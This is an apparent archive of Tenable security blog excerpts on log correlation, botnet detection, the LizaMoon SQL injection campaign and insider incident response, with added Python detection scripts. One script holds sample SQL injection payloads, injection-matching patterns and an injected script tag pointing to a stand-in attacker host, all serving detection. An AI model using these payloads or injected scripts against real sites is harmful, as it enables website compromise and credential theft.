Log Analysis

Log Correlation Engine Version 4 Now Available

by Dale Gardner on June 27, 2012

One of the more vexing challenges security practitioners and managers face is determining, quickly and accurately, which of the myriad events, alerts, and warnings they receive on a continuous basis is most deserving of their attention. Tenable's Unified Security Monitoring (USM) solution uniquely solves that challenge by integrating active and passive vulnerability management with SIEM capabilities, providing a contextualized and prioritized view of events and activity. USM helps users quickly focus their attention and energies on the most pressing security issues, as well as...

Enhanced Botnet Detection with Nessus

by Ron Gula on March 22, 2012

Tenable’s Research team recently added the ability for Nessus to evaluate audited hosts to see if they are connected to or configured with a known botnet IP address. In this blog entry, we will review all of the features available within Nessus for botnet and malware detection, as well as the types of features that are available in other Tenable products.
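The two checks the post describes, a host connected to a known botnet address and a host configured with one, come down to matching addresses pulled from the host against an indicator list. The script below is an added example, not Nessus's own plugin logic: it parses constructed netstat-style output and resolver/hosts-file lines and matches the remote and configured addresses against a constructed indicator list (single hosts and a CIDR block). The addresses used are documentation ranges, not real botnet nodes.

```python
"""Match an audited host's active connections and static network configuration
against a list of known botnet addresses.

Added example, not Nessus's own plugin logic. The indicator list, the
netstat output and the resolver lines are constructed for the example;
the hosts in them are documentation addresses, not real botnet nodes.
"""
import ipaddress
import re

# Constructed indicator list: single hosts and one CIDR block. A real list
# comes from a threat-intelligence feed and is refreshed constantly.
BOTNET_INDICATORS = ["198.51.100.23", "203.0.113.0/24"]

# Constructed `netstat -an`-style output from the audited host.
NETSTAT_OUTPUT = """\
Proto Local Address          Foreign Address        State
tcp   10.0.0.5:52214         93.184.216.34:443      ESTABLISHED
tcp   10.0.0.5:52219         203.0.113.77:6667      ESTABLISHED
tcp   0.0.0.0:22             0.0.0.0:*              LISTEN
udp   10.0.0.5:54123         198.51.100.23:53
"""

# Constructed resolver and hosts-file lines: the "configured with" case,
# where a bot has pointed DNS at its controller.
CONFIG_LINES = [
    "nameserver 198.51.100.23",
    "nameserver 10.0.0.1",
    "93.184.216.34 example.com",
]

_ADDR_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+|\*)$")
_IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def compile_indicators(entries):
    """Turn indicator strings into networks; a bare address becomes a /32."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def matching_indicator(addr, networks):
    """Return the indicator that contains addr, or None."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in networks:
        if ip in net:
            return str(net)
    return None


def parse_netstat(text):
    """Yield (proto, remote_ip, remote_port, state) for each socket line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("tcp", "udp"):
            continue
        m = _ADDR_PORT.match(parts[2])
        if not m:
            continue
        state = parts[3] if len(parts) > 3 else ""
        yield parts[0], m.group(1), m.group(2), state


def find_botnet_connections(netstat_text, indicators):
    """Sockets whose remote end falls inside a botnet indicator."""
    nets = compile_indicators(indicators)
    hits = []
    for proto, ip, port, state in parse_netstat(netstat_text):
        net = matching_indicator(ip, nets)
        if net:
            hits.append({"proto": proto, "remote": f"{ip}:{port}",
                         "state": state, "indicator": net})
    return hits


def find_botnet_config(lines, indicators):
    """Configuration lines that reference a botnet indicator."""
    nets = compile_indicators(indicators)
    hits = []
    for line in lines:
        for ip in _IPV4.findall(line):
            net = matching_indicator(ip, nets)
            if net:
                hits.append({"line": line, "ip": ip, "indicator": net})
    return hits


if __name__ == "__main__":
    for hit in find_botnet_connections(NETSTAT_OUTPUT, BOTNET_INDICATORS):
        print("connection:", hit)
    for hit in find_botnet_config(CONFIG_LINES, BOTNET_INDICATORS):
        print("config:", hit)
```

The CIDR matching matters in practice: botnet controllers move within a hosting provider's block, so indicator feeds often list networks rather than single hosts. Note also that a matching nameserver entry is a stronger signal than a single outbound connection, since it survives reboots and points every DNS lookup at the controller.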

Preventing & Detecting Malware: A Multifaceted Approach

by Paul Asadoorian on April 5, 2011

Successful Attacks from Automated Malware

Recently, malware dubbed "LizaMoon" (named after the first web site found distributing it) has been popping up in the news:

Dubbed LizaMoon, unidentified perpetrators of the scareware campaign inject script into legitimate URLs, so when people try to access the website, they get redirected to a page warning them that their PCs are infected with malware that can be removed by downloading a free AV application called Windows Stability Center.

From LizaMoon SQL Injection Attack Hits Websites

LizaMoon scans web sites for easily exploitable SQL injection vulnerabilities, then uses those to put redirects on the web site that take users to a site which installs malware. This is not a new form of attack; however, the "LizaMoon" malware has been surprisingly successful. Google searches for infected sites report that over 1.5 million pages have been infected. The important thing to note about the infection numbers is that "pages" does not refer to sites, as a site can have multiple infected pages. This type of attack typically works as follows:
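Two places where this kind of attack leaves evidence are the web server's access log (the injection attempts themselves) and the served pages (the injected off-site script tag that performs the redirect). The following is an added example, not code from the original post: it flags access-log requests carrying constructs commonly seen in automated SQL injection (T-SQL DECLARE/CAST of a hex-encoded payload, UNION SELECT) and lists script sources in a page that load from hosts outside the site's own allow-list. All log lines, page content and hostnames are constructed; evil.example stands in for the attacker's redirect host.

```python
"""Detect automated SQL injection attempts in access logs and the injected
off-site <script> tags such an attack leaves in a page.

Added example, not code from the original post. The log lines, page
content and domain names are constructed; `evil.example` stands in for
the attacker's redirect host.
"""
import re
from urllib.parse import unquote_plus, urlparse

# Constructed Apache combined-format access log lines.
ACCESS_LOG = """\
192.0.2.10 - - [05/Apr/2011:10:01:12 +0000] "GET /news.asp?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Apr/2011:10:01:15 +0000] "GET /news.asp?id=7;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x44454C HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.45 - - [05/Apr/2011:10:02:01 +0000] "GET /news.asp?id=7'%20UNION%20SELECT%20name,password%20FROM%20users-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Apr/2011:10:03:40 +0000] "GET /about.asp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed page as served after a successful injection: two legitimate
# scripts plus one injected tag pointing at the attacker's host.
INFECTED_PAGE = """<html><head><title>News</title>
<script src="/js/site.js"></script>
<script src="https://cdn.example.org/jquery.js"></script>
</head><body><p>Story text</p>
<script src=http://evil.example/ur.php></script></body></html>"""

_REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
_SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

# Constructs commonly seen in automated SQL injection: T-SQL batch syntax
# and the hex-encoded payloads used to smuggle an UPDATE past filters.
SQLI_PATTERNS = [
    re.compile(r"\bdeclare\s+@\w+", re.I),
    re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+", re.I),
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    re.compile(r"\bexec\s*\(", re.I),
    re.compile(r";\s*(update|insert|drop)\s", re.I),
]


def parse_access_log(text):
    """Yield one dict per request line; the path is URL-decoded so that
    encoded payloads (%20, %27 ...) are matched in their decoded form."""
    for line in text.splitlines():
        m = _REQUEST.match(line)
        if m:
            yield {"client": m.group(1), "time": m.group(2),
                   "method": m.group(3), "path": unquote_plus(m.group(4)),
                   "status": int(m.group(5))}


def find_sqli_attempts(text):
    """Requests whose decoded path matches at least one injection pattern."""
    hits = []
    for req in parse_access_log(text):
        matched = [p.pattern for p in SQLI_PATTERNS if p.search(req["path"])]
        if matched:
            hits.append({"client": req["client"], "status": req["status"],
                         "path": req["path"], "patterns": matched})
    return hits


def find_injected_scripts(html, trusted_hosts):
    """Script sources loaded from hosts outside the site's allow-list.
    Relative sources have no host and are treated as the site's own."""
    suspicious = []
    for src in _SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host is not None and host.lower() not in trusted_hosts:
            suspicious.append(src)
    return suspicious


if __name__ == "__main__":
    for hit in find_sqli_attempts(ACCESS_LOG):
        print("sqli:", hit["client"], hit["path"])
    print("injected:", find_injected_scripts(INFECTED_PAGE, {"cdn.example.org"}))
```

The status code is kept in each hit because it separates the two cases worth different responses: a 500 on an injection attempt usually means the query broke and the attack failed, while a 200 on a DECLARE/CAST payload is the one to chase, since the injected UPDATE may have run and the page check above is how you confirm it.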

Analyzing the Compromise - without Going Hungry

by Paul Davis on February 21, 2011

It's 4:55 PM on a Friday and you are looking forward to an enjoyable dinner with your family. Your BlackBerry starts buzzing from across your desk while your inbox starts filling up with alerts from your SecurityCenter along with frantic emails from Human Resources. It seems a disgruntled employee named Jack Black quit today and nobody remembered to tell the IT group to disable his accounts until after important files started disappearing. Suddenly, you are stuck in Incident Response mode, gathering data on the user's activities. Do you cancel your reservations?

Fortunately, you have deployed Tenable Network Security's Unified Security Monitoring products, and have a wide array of resources[1] at hand to streamline the response process. These resources include SecurityCenter, the Passive Vulnerability Scanner (PVS) and Log Correlation Engine (LCE). At a high level, what can these resources do for you?

SecurityCenter

SecurityCenter provides a unified view of both vulnerability and event data along with the alerting, ticketing and reporting required for thorough user forensics.

Passive Vulnerability Scanner

PVS not only tracks vulnerabilities, but logs user and network activities detected in real-time on the wire. These activities include:
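The core of the user-forensics step in this scenario is normalising events from several sources into one timeline for the user and separating what happened after the account should have been disabled. The script below is an added example, not Tenable's code (SecurityCenter and LCE do this normalisation and correlation internally); it shows the same logic in plain Python over constructed VPN, Windows logon and file-server log lines. The user name jblack, the hosts, the paths and the termination time are all constructed for the scenario, and the syslog-format lines are assumed to fall in 2011 since that format carries no year.

```python
"""Pull one user's activity out of several log sources into a single
timeline, and flag what happened after the account should have been
disabled.

Added example, not Tenable's code: SecurityCenter and LCE normalise and
correlate events internally; this shows the same logic in plain Python.
The log lines, hosts, paths and the user name are all constructed.
"""
import re
from datetime import datetime

SYSLOG_YEAR = 2011  # syslog-style lines carry no year; assumed for the example

# Time HR says the employee left; an assumed value for the scenario.
TERMINATION_TIME = datetime(2011, 2, 18, 15, 30)

# Constructed events from three sources, each in its own native format.
VPN_LOG = [
    "2011-02-18 09:02:17 vpn1 sslvpn: user=jblack src=198.51.100.9 action=login",
    "2011-02-18 16:12:03 vpn1 sslvpn: user=jblack src=198.51.100.9 action=login",
    "2011-02-18 17:40:11 vpn1 sslvpn: user=jblack src=198.51.100.9 action=logout",
]
WINDOWS_LOG = [
    "Feb 18 16:13:20 dc1 EventID=4624 TargetUserName=jblack WorkstationName=WS-044",
    "Feb 18 16:14:02 dc1 EventID=4624 TargetUserName=asmith WorkstationName=WS-012",
]
FILESERVER_LOG = [
    "18/02/2011 16:20:45 fs1 user=jblack op=READ path=/finance/q4-forecast.xlsx",
    "18/02/2011 16:31:10 fs1 user=jblack op=DELETE path=/finance/q4-forecast.xlsx",
    "18/02/2011 16:33:55 fs1 user=jblack op=DELETE path=/finance/board-deck.pptx",
]

_USER = re.compile(r"(?:user|TargetUserName)=(\S+)")
_DELETE = re.compile(r"op=DELETE path=(\S+)")


def _parse_vpn(line):
    """ISO date prefix, 19 characters, then the message."""
    return datetime.strptime(line[:19], "%Y-%m-%d %H:%M:%S"), line[20:]


def _parse_windows(line):
    """Syslog-style 'Mon DD HH:MM:SS' prefix, 15 characters, no year."""
    ts = datetime.strptime(f"{SYSLOG_YEAR} {line[:15]}", "%Y %b %d %H:%M:%S")
    return ts, line[16:]


def _parse_fileserver(line):
    """Day-first date prefix, 19 characters, then the message."""
    return datetime.strptime(line[:19], "%d/%m/%Y %H:%M:%S"), line[20:]


SOURCES = [
    ("vpn", VPN_LOG, _parse_vpn),
    ("windows", WINDOWS_LOG, _parse_windows),
    ("fileserver", FILESERVER_LOG, _parse_fileserver),
]


def build_timeline(user, sources=SOURCES):
    """Every event naming the user, from all sources, in time order."""
    events = []
    for name, lines, parse in sources:
        for line in lines:
            when, message = parse(line)
            m = _USER.search(message)
            if m and m.group(1).lower() == user.lower():
                events.append({"time": when, "source": name, "message": message})
    events.sort(key=lambda e: e["time"])
    return events


def after_cutoff(events, cutoff):
    """Events that occurred after the account should have been disabled."""
    return [e for e in events if e["time"] > cutoff]


def deleted_paths(events):
    """Files removed in the given events, in order."""
    paths = []
    for e in events:
        m = _DELETE.search(e["message"])
        if m:
            paths.append(m.group(1))
    return paths


if __name__ == "__main__":
    timeline = build_timeline("jblack")
    for e in after_cutoff(timeline, TERMINATION_TIME):
        print(e["time"], e["source"], e["message"])
    print("deleted:", deleted_paths(timeline))
```

The parsers are deliberately one per source: timestamp formats differ, and normalising them to a common datetime before sorting is what makes the cross-source timeline meaningful. On a real network the same step also has to account for clock drift and time zones between log sources before the order of events can be trusted.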

Risky Business Episode 181 - Interview with Paul Asadoorian

by Paul Asadoorian on February 8, 2011

I appeared on Risky Business episode 181 for the "sponsor interview" segment of the show. I really enjoy talking to Patrick Gray - he asks great questions and we always have a great chat. This time around I discussed some topics regarding defensive measures that actually work, including:

Creating listening services that "trap" web spiders
Putting intelligence inside your documents to detect attackers
Monitoring various services and including the results in your SIEM

These topics, and more, will be the topic of my upcoming talk debuting at SOURCE Boston titled "Bringing Sexy Back: Defensive...

Putting a Virus under the SIEM Microscope Webinar

by Ron Gula on January 13, 2011

When a virus infected one of my Nessus scan targets, I did what any sensible CEO of a SIEM company would do - let it run and see what types of logs and alerts it generated! Over the 30 days that I let it run, I was able to collect a wide variety of interesting data. This included suspicious Windows application logs, internal network scans, communication anomalies, attempts to break into other lab computers and "classic" outbound connections to various IRC channels. It even modified how logins worked, breaking my Nessus patch audits. Attendees of this webinar will learn about various detection...

Log Correlation Engine 3.6 – Now with its own GUI

by Ron Gula on January 5, 2011

Tenable Network Security has released version 3.6 of the Log Correlation Engine. This new version includes many performance enhancements as well as its own web-based user interface. This blog entry describes the new user interface, the increased performance and the new features of LCE 3.6.

Risky Business #173 Interview with Ron Gula - Process Accounting and El Jefe

by Ron Gula on October 25, 2010

I was interviewed for episode #173 of the Risky Business information security podcast. The previous Risky Business episode, which discussed the recent release of the open source El Jefe project by Immunity Inc, focused on how process execution tracking for Windows can be a great source of security data - especially compared to raw network traces. During my interview with Patrick Gray, we covered how many SIEMs already have this sort of capability, but most SIEM users don't enable these features because they are complex. I also covered how Tenable's Log Correlation Engine can collect logs from...